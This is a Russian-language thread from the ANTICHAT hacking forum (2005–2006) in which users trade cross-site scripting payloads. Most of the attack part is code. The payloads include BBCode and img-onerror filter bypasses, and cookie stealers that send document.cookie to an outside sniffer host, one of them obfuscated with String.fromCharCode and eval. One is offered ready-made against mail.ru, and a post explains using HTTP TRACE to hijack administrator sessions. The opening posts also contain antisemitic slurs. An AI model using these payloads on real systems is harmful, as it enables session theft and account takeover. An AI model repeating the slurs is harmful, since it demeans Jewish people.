ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.

12.03.2006, 23:10
|
|
Banned
Регистрация: 20.06.2005
Сообщений: 880
Провел на форуме: 4610226
Репутация:
1332
|
|
ты че еврей вопросом на вопросм отвечать? белый жид ахтунг!
|
|
|

12.03.2006, 23:11
|
|
Banned
Регистрация: 12.03.2006
Сообщений: 4
Провел на форуме: 9724
Репутация:
-6
|
|
Сообщение от ZaCo
ты че еврей вопросом на вопросм отвечать? белый жид ахтунг!
Кстати да!!!!
Надо было просто ответить вот в такой форме...
Сообщение от ZaCo
ты че еврей вопросом на вопросм отвечать?
Ррррразве? 
Последний раз редактировалось Arakyla; 12.03.2006 в 23:25..
|
|
|

16.12.2005, 13:15
|
|
Участник форума
Регистрация: 17.08.2005
Сообщений: 237
Провел на форуме: 1575267
Репутация:
27
|
|
Как всегда гениально, но уж сильно много =)
Сохранил буду понемногу разбираться...
|
|
|

31.01.2006, 23:36
|
|
Banned
Регистрация: 31.01.2006
Сообщений: 3
Провел на форуме: 5385
Репутация:
0
|
|
Код HTML:
[quote][color=white][email]wj@wj[url=style=display:none;background:url(javascript:document.images[1].src="http://antichat.org/s/antichat.gif?"+document.cookie);][/url].com[/email][/color][/quote]
Код HTML:
[url=http://www.wj.com wj[url=http://www.wj.com style=display:none;background:url('javascript:alert("wj")') wj]][/url][/url]
Код HTML:
[url=http:// wj[url= style=background:url(javascript:for(;;)open()) wj]][/url][/url]
Код HTML:
[url=http://www.wj.com wj[url=http://www.wj.com style=display:none;background:url('javascript:img=new/**/Image();img.src="http://antichat.org/s/login.gif?"+document.cookie;') wj]][/url][/url]
Код HTML:
<script>img=new Image();img.src="http://antichat.org/s/login.gif?"+document.cookie;</script>
Вот такие тоже бывают примеры вот.
Это все полезно для новичков чтобы знали как это все выглядит.
Мы старые, должны новичком помогать и их обучать вот. 
Последний раз редактировалось President Bush; 31.01.2006 в 23:51..
|
|
|

03.03.2006, 20:08
|
|
Banned
Регистрация: 26.02.2006
Сообщений: 5
Провел на форуме: 21186
Репутация:
-4
|
|
Код HTML:
<img src=http://www.xss.gif s='"p">'onerror=alert(/wj/) style=visibility:hidden>
Вот так ломается mail.ru, inbox.ru, bk.ru, list.ru, rambler.ru, и другие, а главное, что работает проверенно в Опере, Фаерфокс и ИЕ. (Сейчас четвертое Марта, 2006 год)
А вот так ломается инвизион 2.*
Код HTML:
[img]/[snapback] onerror=alert(/wj/) [/snapback].gif[/img]
Где Я поставил табуляции вместо пробелов.
И обратите внимание, что элемент img, не терпит в своем параметре какого либо пробела чтобы сработала функция onerror! Это можно ТОЛЬКО обойти посредством слеша ( /) или точкой с запитой. ( ;)
То есть вот так вот,
<img src="http://www.wj.gif<a href=" onerror=alert('wj') style="display:none;">
Именно из-за пробела в атрибуте src элемента img, в браузере фаерфокс скрипт не сработает! Но за-то вот так вот - сработает.
Код HTML:
<img src="http://www.wj.gif/<a href=" onerror=alert('wj') style="display:none;">
Или,
Код HTML:
<img src="http://www.wj.gif;<a href=" onerror=alert('wj') style="display:none;">
И еще, если этот же код написать в Опере, то работать не будет из-за style="display:none;" но это не беда, ибо можно просто написать вот так вот и все везде будет работать, будучи не видимо для пытливых глаз:
Код HTML:
<img src="http://www.wj.gif;<a href=" onerror=alert('wj') style="visibility:hidden">
Воруем куки...
Код HTML:
<img src=javascript:i=new/**/Image();i.src='http://antichat.ru/cgi-bin/s.jpg?'+document.cookie;>
И еще, иногда обойти фильтры посредством HTML объектов не удается, ( w) тогда приходится прибегать к урл кодировки о которой Я еще не нашел, чтобы кто нибудь знал.
Код HTML:
<img src="javascript:alert('wj')">
Кодируем в урл кодировку,
Код HTML:
<img src="javascript:%61%6C%65%72%74%28%27%77%6A%27%29">
Честно говорю, что очень мало кто знает об этом способе.... Ну и надо еще знать, что закодировать в урл кодировку можно только после протокола JavaScript и т.д.
Иногда приходится угнать куки при помощи vbscript, а как это делается? vbscript как Я теперь узнал, не поддерживает способы вызывать браузерам картинки так, как это в состоянии делать JavaScript, (По крайней мере Я таких примеров не встречал и не нашел) но это не беда, поскольку мы можем обходить эту дилемму посредством перехождения с одного протокола на другой.
Код HTML:
<img src=vbscript:window.execScript("img=new/**/Image();img.src='http://antichat.ru/cgi-bin/s.jpg?'+document.cookie;")>
И опять таки, иногда провести onerror() можно, а все параметры как нам на зло фильтруются и идет жуткая фильтрация на HTML объекты и на прочею дребедень. Ну тогда можно прибегнуть к нашему любимому String.fromCharCode()
<!-- Это нельзя писать произвольно, то большими буквами, то маленькими, то есть вот так, String.FromCharCode() работать у вас не будет. -->
И так, используем уже готовую ссылку,
http://ferruh.mavituna.com/stringfromcharcode.asp?
И кодируем следующую строку.
Код HTML:
document.images[1].src="http://antichat.ru/cgi-bin/s.jpg?"+document.cookie;
Которая есть ни что иное как код сниффера, который работает к примеру вот так, в таком виде:
Код HTML:
<img src="http://www.badimage.gif" onerror='document.images[0].src="http://antichat.ru/cgi-bin/s.jpg?"+document.cookie;'>
И получаем следующие:
Char :
document.images[0].src="http://antichat.ru/cgi-bin/s.jpg?"+document.cookie;
Ascii :
100,111,99,117,109,101,110,116,46,105,109,97,103,1 01,115,91,48,93,46,115,114,99,61,34,104,116,116,11 2,58,47,47,97,110,116,105,99,104,97,116,46,114,117 ,47,99,103,105,45,98,105,110,47,115,46,106,112,103 ,63,34,43,100,111,99,117,109,101,110,116,46,99,111 ,111,107,105,101,59
JS Code :
Код HTML:
String.fromCharCode(100,111,99,117,109,101,110,116,46,105,109,97,103,101,115,91,48,93,46,115,114,99,61,34,104,116,116,112,58,47,47,97,110,116,105,99,104,97,116,46,114,117,47,99,103,105,45,98,105,110,47,115,46,106,112,103,63,34,43,100,111,99,117,109,101,110,116,46,99,111,111,107,105,101,59);
Ну а теперь применяем наш закодированный вариант, в совокупности функцией eval()
Код HTML:
<img src="http://www.badimage.gif" onerror=eval(String.fromCharCode(100,111,99,117,109,101,110,116,46,105,109,97,103,101,115,91,48,93,46,115,114,99,61,34,104,116,116,112,58,47,47,97,110,116,105,99,104,97,116,46,114,117,47,99,103,105,45,98,105,110,47,115,46,106,112,103,63,34,43,100,111,99,117,109,101,110,116,46,99,111,111,107,105,101,59));>
Смотрим лог сниффера, http://www.antichat.ru/sniff/log.php
Если кто нибудь хочет узнать как создавать липовые страницы, то вот Я описал этот метод на этой ссылки.
http://video.antichat.net/file181.html
White Jordan.
Администрация несет полную ответственность за ваши взломы.
|
|
|

03.03.2006, 20:46
|
|
Banned
Регистрация: 26.02.2006
Сообщений: 5
Провел на форуме: 21186
Репутация:
-4
|
|
Код HTML:
<img src=http://www.xss.gif s='"p">'onerror=i=new/**/Image();i.src='http://antichat.ru/cgi-bin/s.jpg?'+document.cookie; style=visibility:hidden>
Просто все хотели готовый код куки воровать на mail.ru так что вот вам. Резвитесь.
P.S.
Чтобы обезопасится от такой атаки, достаточно просто выключить загрузку картинок в своем браузере.
Но однако не совсем ок, ибо логически можно провести атаку метода Tarce, о котором Я как нить тоже напишу статью.
Method Trace
Метод Trace, это такой способ, который позволяет проводить атаку XSS вне зависимости где находится жертва. Как мы все знаем, куки не переходят от одной области в другую, то есть если Я сейчас создам страницу на narod.ru с кодом воровки кук, и тут на античатовском форуме пройдусь по этой ссылки залогинившися при этом в мой аккунт, то мои куки полетят на сниффер от НАРОДА а не от форума античата. С методом трейс однако, это легко обходится. Болие того, если картинки отключены, то тоже реально упереть куки если провести эту атаку, которую можно провести где угодно. Понимайте метод трейс, как метод атаки XSS на WWW в любом месте, в любое время.
Как узнать если этот метод поддерживается?
Очень просто, он всегда включен по умолчанию, но можно и проверить написав код или на Джаваскрипт, или же воспользоваться этой ссылкой.
http://web-sniffer.net/
Можно ли ломануть античатовский форум этим методом? Да! Реально ли? Да! Убийство ли это времени? О да! +)
Как? Да очень просто, совсем не обязательно просить или нудить кого нибудь посетить нашу ссылку которая будет воровать куки Админов а то и сессию админской панели, когда это можно сделать в любом месте и сделать чтобы скрипт срабатывал автоматически и без ведо админа, ну к примеру просто послав Админу или кому угодно на античате на мыло к примеру мейл.ру письмо, или туда где админ или наша жертва обитает будь то уязвимый форум, чат т.д. и вместо кода сниффера для мейл.ру, впаять код сниффера для античатовского форума. Так как ИП теперь у нас привязывается к сессии (Кстати это из-за меня +) ) и кук нам не совсем достаточно, то есть два пути:
1. Или уловить админа и своровать админ-панельские куки, которые можно тут же применить и выполнить с ними собственный скрипт сделав себя админом, или же, узнавать с помощью скрипта мыльники пользователей и их взламывать, что для меня очень легко делать через XSS. Потом можно сделать себе ретрив паролей. +)
Ну логически будет просто метод трейс отключить так? Ведь все что нужно, так это отключить на античате этот метод и усе.....
А ведь можно еще и заставить проксю, то есть прокси сервер которым античатовец пользуется, вернуть нам трейс информацию, то есть - его куки. +)
Короче вот интересная чтива.
http://www.cgisecurity.com/whitehat-...per_screen.pdf
http://www.modsecurity.org/archive/a...rikes_back.txt
Тут очень все ясно и понятно.
Последний раз редактировалось Technic; 03.03.2006 в 23:03..
|
|
|

04.03.2006, 10:11
|
|
Познающий
Регистрация: 10.11.2005
Сообщений: 75
Провел на форуме: 367531
Репутация:
4
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|